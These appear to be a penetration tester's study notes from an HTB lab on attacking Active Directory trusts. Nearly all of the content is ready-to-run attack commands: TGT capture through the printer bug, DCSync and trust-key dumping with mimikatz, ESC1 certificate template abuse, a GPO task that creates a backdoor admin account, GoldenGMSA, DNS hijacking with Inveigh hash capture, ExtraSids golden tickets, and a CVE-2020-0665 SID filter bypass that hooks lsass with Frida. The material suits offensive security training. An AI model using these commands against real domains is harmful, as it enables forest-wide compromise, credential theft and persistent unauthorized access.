Trust Enumeration and Attacks
Cross Forest Attacks Concepts
Enumeration
#Powershell Cmdlet
PS C:\htb> Import-Module activedirectory
PS C:\htb> Get-ADTrust -Filter *
#Powerview
PS C:\htb> Get-DomainTrust
PS C:\htb> Get-DomainTrustMappingAutomatic tools
#Bloodhound
PS C:\htb> .\SharpHound.exe -c All --zipfilename Megacorp
#Adalanche
PS C:\Tools> .\Adalanche.exe collect activedirectory --domain inlanefreight.local
PS C:\Tools> .\Adalanche.exe collect activedirectory --domain logistics.local
PS C:\Tools> .\Adalanche.exe analyzeIntra Forest Attacks
Unconstrained Delegation (Printer Bug - Child to Parent)
#Monitor to capture TGT's
PS C:\Tools> .\Rubeus.exe monitor /interval:5 /nowrap
#Abuse Printer Bug
PS C:\Tools> .\SpoolSample.exe parent.domain.local child.domain.localExample output:
PS C:\Tools> .\Rubeus.exe monitor /interval:5 /nowrap
[*] 1/29/2025 12:47:13 AM UTC - Found new TGT:
User : DC01$@INLANEFREIGHT.AD
StartTime : 1/28/2025 6:40:22 PM
EndTime : 1/29/2025 4:40:22 AM
RenewTill : 2/4/2025 6:40:22 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
<SNIF>doIFvDCCBbMjJaqBIbEElOTEFORUZSRUlHSFQuQUSpJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEElOTEFORUZSRUlHSFQuQUQ=# Create sacrifical process + Pass the ticket
PS C:\Tools> .\Rubeus.exe createnetonly /program:powershell.exe /show
PS C:\Tools> .\Rubeus.exe renew /ticket:<ticket> /ptt
#DCSync
PS C:\Tools>mimikatz.exe privilege::debug "lsadump::dcsync /dc:dc01.inlanefreight.ad /domain:inlanefreight.ad /all" exitConfiguration Naming Context (NC)
Configuration Naming Context (NC) replication abuse is a malicious strategy in which attackers take advantage of the replication process within the Configuration Naming Context of Active Directory. This exploitation allows them to disseminate unauthorized modifications or configurations throughout the domain infrastructure.
An attacker may exploit this vulnerability to conduct a range of attacks, including those targeting Active Directory Certificate Services (ADCS), manipulating Group Policy Objects (GPOs) at the site level, altering DNS entries, or executing GoldenGMSA (Group Managed Service Account) attacks. Such actions can result in unauthorized access, privilege escalation, or other detrimental activities within the parent domain originating from a child domain.
#Enumerate ACL's for WRITE access on Configuration Naming Context
PS C:\Users\Administrator> $dn = "CN=Configuration,DC=INLANEFREIGHT,DC=AD"
PS C:\Users\Administrator> $acl = Get-Acl -Path "AD:\$dn"
PS C:\Users\Administrator> $acl.Access | Where-Object {$_.ActiveDirectoryRights -match "GenericAll|Write" }Abusing ADCS - Make Template vulnerable to ESC1 to privilege escalation (Child -> Parent)
The Certificate Templates container stores templates as pKICertificateTemplate objects that can be published to an ADCS CA.
The Enrollment Services container contains one pKIEnrollmentService object per CA. These objects enumerate the templates that have been published to the CA through their certificateTemplates property.
Simplification of ADCS Attack:
Add a new vulnerable
Certificate Templateinside theCertificate Templatescontainer as apKICertificateTemplateobject.Give the
Administratoruser of the child domainFull Controlrights over the created Certificate Template.Publish the created template to the CA server by modifying the
pKIEnrollmentServiceobject of the CA inside theEnrollment Servicescontainer.After the Configuration NC is replicated back to the parent domain, request the certificate for
root\Administratorfrom the child domain.
#Use Psexec to Open MMC as a SYSTEM user
PS C:\Tools\> .\PsExec -s -i powershell
PS C:\Windows\system32> mmcCreate a new Console on mmc and add Certificate Template
Go to File > Add/Remove Snap-in
Select Certificate Templates
Add it.
Save Changes
Make Template Vulnerable to ESC1
Right-click on the
Usertemplate.Select
Duplicate Template. This action will open a prompt with the properties of the new template.Set the
Subject Nameoption toSupply in the request. This configuration allows for dynamic specification of the subject name during the certificate request process, potentially introducing the ESC1 vulnerability.
Grants Full control to SYSTEM
PS C:\Windows\system32> adsiedit.msc
Right click on Public Key Services
Go to Properties > Security
Go to Advance
Select System and grants Full control and
This object and all descendant objects.Apply
Add the malicious template to PKIEnrollmentService
Go to Enrollment Services
Right click on PkiEnrollmentService > Properties
Select certificate Templates and add the template.
Apply the changes.
Check ADCS ESC1
Active Directory Certificate ServicesGPO On Site Attack Across Trust (Child -> Parent)
Powerview Older Version
PS C:\Tools> $gpo = "Backdoor"
PS C:\Tools> New-GPO $gpo
PS C:\Tools> Import-Module .\PowerView_2.ps1
PS C:\Tools> New-GPOImmediateTask -Verbose -Force -TaskName 'Backdoor' -GPODisplayName "Backdoor" -Command C:\Windows\System32\cmd.exe -CommandArguments "/c net user backdoor B@ckdoor123 /add"
#Retrieving the Replication Site of the Root Domain Controller
PS C:\Tools> Get-ADDomainController -Server inlanefreight.ad |Select ServerObjectDN
#Linking the GPO to the Default Site as SYSTEM
PS C:\Tools> .\PsExec.exe -s -i powershell.exe
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> $sitePath = "CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=INLANEFREIGHT,DC=AD"
PS C:\Windows\system32> New-GPLink -Name "Backdoor" -Target $sitePath -Server dev.inlanefreight.ad
#Request TGT
PS C:\Tools> .\Rubeus.exe asktgt /user:backdoor /password:'B@ckdoor123' /domain:inlanefreight.ad /pttGoldenGMSA Attack Across Trust (Child -> Parent)
Access: Configuration > Services > Group Key Distribution Service > Master Root Keys
# Create GMSA
PS C:\Users\Administrator> New-ADServiceAccount -Name "apache-dev" -DNSHostName "inlanefreight.ad" -PrincipalsAllowedToRetrieveManagedPassword htb-student-1 -Enabled $TruePerforming the Online Attack (Online Computation)
#Open a terminal as System
C:\Tools\> .\PsExec -s -i powershell
#Retrieving msds-ManagedPasswordID
PS C:\Tools> .\GoldenGMSA.exe gmsainfo --domain domain.example
#Retrieving GMSA Password
PS C:\Tools> .\GoldenGMSA.exe compute --sid "S-1-5-21-2879935145-656083549-3766571964-1106" --forest dev.inlanefreight.ad --domain inlanefreight.ad
Performing the Offline Attack (Offline Computation)
#Open a terminal as System
C:\Tools\> .\PsExec -s -i powershell
#Retrieving msds-ManagedPasswordID
PS C:\Tools> .\GoldenGMSA.exe gmsainfo --domain inlanefreight.ad
#Retrieving kdsinfo
PS C:\Tools> .\GoldenGMSA.exe kdsinfo --forest dev.inlanefreight.ad
#Computing the gMSA Password Manually
PS C:\Tools> .\GoldenGMSA.exe compute --sid <SID> --kdskey <blob> --pwdid <blob>
Convert to NT Hash
Tool: CyberChef
from Crypto.Hash import MD4
import base64
base64_input = "<blob>"
print(MD4.new(base64.b64decode(base64_input)).hexdigest())
DNS Wildcard Injection
Attackers can exploit wildcard records to redirect or manipulate network traffic by creating malicious DNS entries that match the wildcard pattern. This can lead to unauthorized access, phishing attacks, or the interception of sensitive information.
#Resolve DNS name
PS C:\Tools> Resolve-DNSName TEST2.inlanefreight.ad
#Adding Wildcard DNS record
C:\Tools\> .\PsExec -s -i powershell
PS C:\Tools> Import-module .\Powermad.ps1
PS C:\Tools> New-ADIDNSNode -Node * -domainController DC01.inlanefreight.ad -Domain inlanefreight.ad -Zone inlanefreight.ad -Tombstone -VerboseArbitrary DNS Record Modification from Child Domain
It is also possible to modify the IP address associated with an already existing DNS record in the parent domain from within the child domain.
#Enumerate DNS Records Parent Domain
PS C:\Tools> Get-DnsServerResourceRecord -ComputerName DC01.inlanefreight.ad -ZoneName inlanefreight.ad -Name "@"
#Enumerate DNS Records for specific Server
PS C:\Tools> Resolve-DnsName -Name example.inlanefreight.ad -Server DC01.INLANEFREIGHT.AD
#Open Terminal as NT SYSTEM
PS C:\Tools\> .\PsExec -s -i powershell
#Modifying DNS Records to point to child domain ip
PS C:\Tools> $Old = Get-DnsServerResourceRecord -ComputerName DC01.INLANEFREIGHT.AD -ZoneName inlanefreight.ad -Name DEV01
PS C:\Tools> $New = $Old.Clone()
PS C:\Tools> $TTL = [System.TimeSpan]::FromSeconds(1)
PS C:\Tools> $New.TimeToLive = $TTL
PS C:\Tools> $New.RecordData.IPv4Address = [System.Net.IPAddress]::parse('172.16.210.3')
PS C:\Tools> Set-DnsServerResourceRecord -NewInputObject $New -OldInputObject $Old -ComputerName DC01.INLANEFREIGHT.AD -ZoneName inlanefreight.ad
PS C:\Tools> Get-DnsServerResourceRecord -ComputerName DC01.inlanefreight.ad -ZoneName inlanefreight.ad -Name "@"
#Start Inveigh for Hash Interception
PS C:\Tools> Import-Module .\Inveigh.ps1
PS C:\Tools> Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y -SMB Y
#Lateral Movement by using Rubeus
PS C:\Tools> .\Rubeus.exe asktgt /user:buster /domain:inlanefreight.ad /password:<SNIP> /pttTo crack NTLMv2 Go to:
Password AttacksKerberoasting cross forest
#Kerberoasting
PS C:\Tools> .\Rubeus.exe kerberoast /domain:logistics.ad /nowrapAsreproasting cross forest
#Asreproasting
PS C:\Tools> .\Rubeus.exe asreproast /domain:logistics.ad /nowrapCross Forest Attacks
Trust Account Attack
#Perform the attack
PS C:\Tools> .\mimikatz.exe privilege::debug "lsadump::trust /patch" exit
#Request TGT
PS C:\Tools> .\Rubeus.exe asktgt /user:logistics$ /domain:megacorp.ad /rc4:68e456d3a95cc748ac5a2eae679b9c91 /pttUnconstrained Delegation Cross Forest (DomainA > DomainB)
Requirements for exploitation to be possible in a Cross-Forest environment
TGT Delegation must be allowed in the trust (without 2019 updates or enabled manually).
Selective authentication must not be enabled, which would prevent automatic authentication between forests.
A two-way trust must exist between forests.
Authentication levels in Cross-Forest Trusts
Forest-wide authentication → Allows unrestricted access between forests (less secure).
Domain-wide authentication → Restricts access to only users in a specific domain.
Selective authentication → Requires specific permissions for each user (more secure).
If a domain controller (DC) in Forest-A which has unconstrained delegation enabled by default is compromised, we could potentially extract the Ticket Granting Ticket (TGT) of an Administrator from the domain controller in Forest-B who subsequently logs into DC of Forest-A. With this TGT, we gain the ability to compromise the Forest-B.
Alternatively, if no user or Administrator logs into the domain controller (DC) in Forest-A from Forest-B, we can exploit the Printer bug to force an authentication attempt from the DC in Forest-B to the DC in Forest-A. This forced authentication allows us to intercept the TGT of the machine account of Forest-B DC (DC02$). Subsequently, we can leverage this TGT to execute a DCSync attack, allowing us to escalate privileges and further compromise the network
#Monitor to capture TGT's
PS C:\Tools> .\Rubeus.exe monitor /interval:5 /nowrap
#Abuse Printer Bug
PS C:\Tools> .\SpoolSample.exe dc01.domain.local dc02.domain.localSID History Injection Attack
SID History Injection Attack, commonly referred to as SID Hijacking, is a method employed to escalate privileges by taking advantage of the SID (Security Identifier) history attribute found in Active Directory user accounts. When a user account is transferred from one domain to another within a different forest, the SID history attribute retains the SIDs from the original domain.
An attacker can exploit this functionality by injecting the SID of a user or group with elevated privileges from the target domain into a low-privileged user account in the source domain. This action enables the low-privileged account to inherit the access rights and privileges linked to the injected SID. Consequently, the attacker can elevate their privileges and gain unauthorized access to resources or execute actions within the target domain as if they were part of the highly privileged group or user.
Case #1 High Privileged Migrated User
SID history Enabled
The User in DomainA belongs to Powerfull group
The user has been migrated from DomainA to DomainB
We compromised the Domain B as Administrator and we start to enumerate.
#Enumerate user with SID History Enabled
PS C:\Tools> Get-ADUser -Filter "SIDHistory -Like '*'" -Properties SIDHistory
#Change Password
PS C:\Tools net user targetuser target
In this point we can move to the target user either kerberos or any type of authentication
#Request TGT
PS C:\Tools> ./Rubeus createnetonly /program:powershell.exe /show
PS C:\Tools> .\Rubeus.exe asktgt /user:sentinal /password:sentinal /domain:inlanefreight.ad /ptt
#Get Access to DomainA
PS C:\Tools> Enter-PSSession DC.domainA.localCase-2: Low Privileged Migrated User
In scenarios where migrated users do not possess substantial privileges in their previous domain or no users are migrated, it's advisable to verify if SID History is still enabled on the domain.
#Enumerate SID History
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainTrust -domain logistics.ad
#Retrieve only TrustAttributes for Domain
Get-DomainTrust -domain target.domain | Where-Object {$_.TargetName -eq "current.domain"} | Select TrustAttributesWith the presense of TREAT_AS_EXTERNAL an Extrasids attack becomes possible. This attack involves injecting the SID of a highly privileged group or user from the targetdomain domain into any user object in the currentdomain domain.
Mision: Run bloodhound against target domain and look for high privilege group to be able to inject its SID into current user domain
To perform this attack, we need the following:
The KRBTGT hash for the current domain (Inlanefreight)
The SID for the current domain
The name of a target user in the current domain (Any domain user)
The FQDN of the current domain.
The SID of the high privileged group of the target domain (Infrastructure group)
#Rubeus
PS C:\Tools> .\Rubeus.exe golden /rc4:119885a9af438d1ef0d7543bed8b9ea1 /sid:S-1-5-21-2432454459-173448545-3375717855 /user:Intrusionz3r0 /sids:S-1-5-21-186204973-2882451676-2899969076-2602 /domain:inlanefreight.ad /ptt
#mimikatz:
PS C:\Tools> .\mimikatz.exe privilege::debug "kerberos::golden /krbtgt:119885a9af438d1ef0d7543bed8b9ea1 /domain:inlanefreight.ad /sid:S-1-5-21-2432454459-173448545-3375717855 /user:Intrusionz3r0 /sids:S-1-5-21-186204973-2882451676-2899969076-2602 /ptt" exitSID Filter Bypass (CVE-2020-0665)
This vulnerability leverages the intended feature of a Transitive Trust, allowing an attacker to compromise any host or workstation within a trusted forest that has a Two-way Transitive Trust relationship established with the Trusting forest.
Be on the Trusting Forest
Fake a new domain in forest A that has the same SID as the local domain on a server in forest B.
Wait for forest B to pick up the new SID and add it to the allowed SIDs.
Create an inter-realm ticket that includes the SID of the local administrator account of the server in forest B, and give this to the DC in forest B.
See if forest B gives us a ticket that includes the SID of the server in forest B
Connect to the server in forest B with our service ticket having administrative permissions.
Attack Requirements for CVE-2020-0665
DC01 and DC02 must have a Two-way Transitive Trust
DC01 must have a Child Domain (subdomain)
DC02 has at least one domain joined member server or workstation
To perform this attack after compromising the Inlanefreight domain, we need to collect the following:
Local SID of the victim server (SQL02.logistics.ad)
S-1-5-21-2327345182-1863223493-3435513819
getlocalsid.py
Child Domain SID for child.inlanefreight.ad
S-1-5-21-3878752286-62540090-653003637
lookupsid.py
Domain SID for inlanefreight.ad
S-1-5-21-2432454459-173448545-3375717855
lookupsid.py
Inter-realm tickets with RC4 hash (for logistics.ad)
c586031a224f252a7c8a31a6d2210cc1
Get-ADObject and mimikatz
Inter-realm tickets with AES keys (for logistics.ad)
179e4ae68e627e1fd4014c87854e7f60b0c807eddbcaf6136ddf9d15a6d87ad8
Get-ADObject and mimikatz
#Get Local SID Victic Server
Intrusionz3r0@htb[/htb]$ proxychains python getlocalsid.py inlanefreight.ad/Administrator@SQL02.logistics.ad SQL02
#Retrieve Domain SID for child.inlanefreight.ad
Intrusionz3r0@htb[/htb]$ proxychains lookupsid.py inlanefreight.ad/Administrator:'HTB_@cademy_adm!'@172.16.118.20 | grep "Domain SID"
#Retrieve Domain SID for inlanefreight.ad
Intrusionz3r0@htb[/htb]$ proxychains lookupsid.py inlanefreight.ad/Administrator:'HTB_@cademy_adm!'@172.16.118.3 | grep "Domain SID"'#Enumerate GUID for logistics.ad
PS C:\Users\Administrator> Get-ADObject -LDAPFilter '(objectClass=trustedDomain)' | select name,objectguid
name objectguid
---- ----------
logistics.ad 8d52f9da-361b-4dc3-8fa7-af5f282fa741
child.inlanefreight.ad 44591edf-66d2-4d8c-8125-facb7fb3c643
#Retrieve the Inter-real tickets
PS C:\Tools> .\mimikatz.exe "lsadump::dcsync /guid:{8d52f9da-361b-4dc3-8fa7-af5f282fa741}" exitNext step is convert the SID to binary
input_string = input('\nSID: ')
prefix = 'S-1-5-21-'
# Split the input string after the constant prefix
components = input_string.split(prefix, 1)
if len(components) > 1:
remaining_string = components[1]
split_values = remaining_string.split('-')
output_list = []
for i in split_values:
decimal_number = int(i)
hexadecimal_value = hex(decimal_number)[2:].zfill(8)
little = ' '.join([hexadecimal_value[i:i+2] for i in range(len(hexadecimal_value)-2, -2, -2)])
bytes_list = little.split()
formatted_bytes = ', '.join([f"0x{byte.upper()}" for byte in bytes_list])
output_list.append(formatted_bytes)
final_output = ', '.join(output_list)
print("0x01, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x15, 0x00, 0x00, 0x00, " + final_output)#SQL02.logistics.ad
Intrusionz3r0@htb[/htb]$ python3 SIDtoBinary.py
Insert the SID: S-1-5-21-2327345182-1863223493-3435513819
0x01, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x15, 0x00, 0x00, 0x00, 0x1E, 0x78, 0xB8, 0x8A, 0xC5, 0x88, 0x0E, 0x6F, 0xDB, 0xC7, 0xC5, 0xCC
#child.inlanefreight.ad
Intrusionz3r0@htb[/htb]$ python3 SIDtoBinary.py
Insert the SID: S-1-5-21-3878752286-62540090-653003637
0x01, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x15, 0x00, 0x00, 0x00, 0x1E, 0x10, 0x31, 0xE7, 0x3A, 0x49, 0xBA, 0x03, 0x75, 0x0B, 0xEC, 0x26Updating SID Values in frida_intercept.py
<SNIP>
// Sid as binary array to find/replace
var buf1 = [0x01, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x15, 0x00, 0x00, 0x00, 0x1E, 0x10, 0x31, 0xE7, 0x3A, 0x49, 0xBA, 0x03, 0x75, 0x0B, 0xEC, 0x26];
var newsid = [0x01, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x15, 0x00, 0x00, 0x00, 0x1E, 0x78, 0xB8, 0x8A, 0xC5, 0x88, 0x0E, 0x6F, 0xDB, 0xC7, 0xC5, 0xCC];
<SNIP>Before to modify
#Verify Original SID of Child DC
Intrusionz3r0@htb[/htb]$ python3 gettrustinfo.py <domain-dc01>/<domain-dc02>@<hostname-DC01> -hashes :<rc4-inter-realm-DC02> -target <dc-ip-dc01>
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
<SNIP>
DomainInfo:
Sid:
Revision: 1
SubAuthorityCount: 4
IdentifierAuthority: b'\x00\x00\x00\x00\x00\x05'
SubAuthority:
[
21,
3878752286,
62540090, #<-------Now it has the SID child.domain
653003637,
]
DnsName: 'child.inlanefreight.ad'
NetbiosName: 'CHILD' ,
] Run the attack
#Update as NT System
PS C:\Tools> .\PsExec.exe -s -i powershell.exe
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Tools> python frida_intercept.py lsass.exeAfter modification
Intrusionz3r0@htb[/htb]$ python3 gettrustinfo.py inlanefreight.ad/logistics.ad@DC01 -hashes :c586031a224f252a7c8a31a6d2210cc1 -target 172.16.118.3 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] StringBinding ncacn_ip_tcp:172.16.118.3[49671]
NetrGetForestTrustInformationResponse
ReturnAuthenticator:
Credential:
Data: b'\xc9\xe1\x18z\x92\x8ew '
Timestamp: 0
ForestTrustInfo:
RecordCount: 3
Entries:
[
Flags: 0
ForestTrustType: ForestTrustTopLevelName
Time: 0
ForestTrustData:
tag: 0
TopLevelName: 'inlanefreight.ad' ,
Flags: 0
ForestTrustType: ForestTrustDomainInfo
Time: 0
ForestTrustData:
tag: 2
DomainInfo:
Sid:
Revision: 1
SubAuthorityCount: 4
IdentifierAuthority: b'\x00\x00\x00\x00\x00\x05'
SubAuthority:
[
21,
2432454459,
173448545,
3375717855,
]
DnsName: 'inlanefreight.ad'
NetbiosName: 'INLANEFREIGHT' ,
Flags: 0
ForestTrustType: ForestTrustDomainInfo
Time: 0
ForestTrustData:
tag: 2
DomainInfo:
Sid:
Revision: 1
SubAuthorityCount: 4
IdentifierAuthority: b'\x00\x00\x00\x00\x00\x05'
SubAuthority:
[
21,
2327345182,
1863223493, #<--------- If you see the Local SID of the victim server (works!)
3435513819,
]
DnsName: 'child.inlanefreight.ad'
NetbiosName: 'CHILD' ,
]
ErrorCode: 0 Create Golden ticket:
LocalSID of victim server (SQL02.logistics.ad) -
S-1-5-21-2327345182-1863223493-3435513819Child Domain SID for
child.inlanefreight.ad-S-1-5-21-3878752286-62540090-653003637Domain SID for
inlanefreight.ad-S-1-5-21-2432454459-173448545-3375717855Inter-realm tickets with RC4 hash (For Logistics.ad) -
c586031a224f252a7c8a31a6d2210cc1Inter-realm tickets with AES keys (For Logistics.ad) -
179e4ae68e627e1fd4014c87854e7f60b0c807eddbcaf6136ddf9d15a6d87ad8
#Request Golden Ticket with Extrasids
PS C:\Tools> .\mimikatz.exe privilege::debug "kerberos::golden /domain:<domain-dc01> /sid:<sid-domain-dc01> /user:user1 /target:<domain-dc02target> /service:krbtgt /sids:<LocalSID-Victimserver>-500 /aes256:<Inter-realm-AES-DC02>" exit
#Retrieve TGS for SQL02
PS C:\Tools> .\kekeo.exe
kekeo # tgs::ask /tgt:ticket.kirbi /service:cifs/SQL02.logistics.ad@LOGISTICS.AD /kdc:DC02.logistics.ad /pttAbusing SQL Server Links and Trustworthy Databases
[1433] MSSQLAbusing PAM Trusts
#Enumerate Shadows Principals
PS C:\Tools> Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | flCreating Shadow Principals in Bastion forest
If No Shadow Principals Exist you can create one:
# Get the SID for the Enterprise Admins group of the user forest
$ShadowPrincipalSid = (Get-ADGroup -Identity 'Enterprise Admins' -Properties ObjectSID -Server eulogistics.corp).ObjectSID
# Container location
$Container = 'CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=controlcenter,DC=corp'
# Create the Shadow principal
New-ADObject -Type msDS-ShadowPrincipal -Name "Tom" -Path $Container -OtherAttributes @{'msDS-ShadowPrincipalSid'= $ShadowPrincipalSid}
# We can add a user from bastion forest to an existing bastion forest's shadow security principal container named Tom
Set-ADObject -Identity "CN=Tom,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=controlcenter,DC=corp" -Add @{'member'="CN=Administrator,CN=Users,DC=controlcenter,DC=corp"} -VerboseAccess the resources
PS C:\Tools> whoami;hostname
controlcenter\administrator
DC01
PS C:\Tools> ls \\DC-EU.eulogistics.corp\c$Last updated